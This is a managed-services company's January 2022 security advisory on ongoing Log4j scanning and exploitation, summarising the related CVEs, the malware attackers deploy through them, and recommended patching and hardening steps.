Cybersecurity Threat Advisory: Continued Log4j Scanning Activity
Posted on January 7, 2022 by Mike Beagles
As part of our effort to inform our clients about potential and serious cybersecurity issues, MCP provides advisories about vulnerabilities and exploits that could threaten the operations of their critical communications networks. Sign up to receive these advisories in your inbox as soon as they are released.
This week there is a new critical alert that requires the mission-critical community’s immediate attention.
In recent weeks, Microsoft has observed continued attempts by nation-state adversaries and commodity attackers to exploit security vulnerabilities uncovered in the Log4j open-source logging framework. Scanning activity and exploit attempts for the related vulnerabilities also has been observed in attempts by cyberattackers to deploy malware. MCP strongly recommends patching networks and systems with the latest update for Log4j to prevent compromise.
What Is the Threat?
Cyberattackers are continuing their attempts to scan for and exploit the Log4j vulnerability first revealed on December 10, 2021. Microsoft’s Threat Intelligence Center (MSTIC) released guidance earlier this week stating that “exploitation attempts and testing have remained high during the last weeks of December.” Furthermore, they “observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks.”
The remote code execution vulnerability in this framework has emerged as a strong vector for cyberattackers to gain an initial foothold within a network or system. The subsequent weeks after the initial discovery saw four more weaknesses in the Log4j utility, identified as CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832. The discovery of these additional vulnerabilities has provided cyberattackers with persistent control over the compromised assets, enabling them to perform additional campaigns, such as cryptocurrency mining or ransomware.
Why Is it Noteworthy?
This is especially noteworthy due to the prevalence of Log4j’s use within applications. While the most notorious affected application is via the Apache software platform, millions of other applications also utilize this framework. An unpatched device may enable a cyberattacker to gain an initial foothold, which they then can use to deploy devastating attacks on a network or system. Even as scanning attempts are not diminishing, cyberattackers also have been attempting to evade string-matching detections by obfuscating the payloads they use to perform a request to the attacker-controlled site.
What Is the Risk?
Successful exploit attempts may lead to cyberattackers deploying ransomware, cryptocurrency miners, or backdoors to networks and systems. They also may attempt to maintain persistence in a network to exfiltrate sensitive data. In addition, cyberattackers are utilizing this vulnerability as a vector to drop Meterpreter, Bladabindi (NjRAT) and HabitsRAT remote access toolkits on networks systems, which may give them complete control over a machine.
MSTIC noted that, “at this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments,” and that “due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance.”
Meanwhile, the Federal Trade Commission (FTC) also issued a warning that it “intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.” In other words, organizations that do not adhere to this warning may face severe legal action for not securing their networks systems adequately against this threat.
What Are the Recommendations?
MCP recommends the following actions to limit the impact of attempted Log4j exploitations:
- Ensure networks and systems are up to date if they utilize an application that uses Log4j
- Deploy endpoint protection, which can block any malware deployed by cyberattackers once the vulnerability is exploited
- Utilize a strong password policy and perform account audits regularly to ensure network and system security
- Ensure that services such as Remote Desktop Protocol (RDP) are not open externally, which would enable a cyberattacker to remote into a network or system with valid credentials.
For more in-depth information about the recommendations, please visit the following link:
If you are looking for guidance, please reach out. MCP offers a comprehensive cybersecurity solutions suite that is designed specifically for public safety and justice entities and other critical infrastructure organizations to help them determine their network, data, and application vulnerabilities. We can help you develop a complete cyberattack prevention strategy. Contact us today to learn more.
Mike Beagles is MCP's director of IT and cybersecurity services. He can be reached here.